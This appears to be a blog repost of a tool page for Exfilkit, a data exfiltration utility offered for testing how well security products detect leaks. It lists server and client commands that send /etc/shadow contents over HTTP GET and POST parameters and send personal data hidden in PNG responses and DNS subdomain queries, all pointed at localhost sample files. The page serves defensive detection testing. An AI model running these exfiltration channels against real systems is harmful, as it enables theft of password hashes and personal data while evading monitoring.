Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities
Data exfiltration utility for testing detection capabilities
Description
Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To
/etc/shadow -> HTTP GET requests
Server
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
Client
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
/etc/shadow -> HTTP POST requests
Server
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
Client
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
PII -> PNG embedded in HTTP Response
Server
$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
Client
# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
PII -> DNS subdomains querying
Server
# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
Client
$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities
Reviewed by Zion3R
on
8:30 AM
Rating: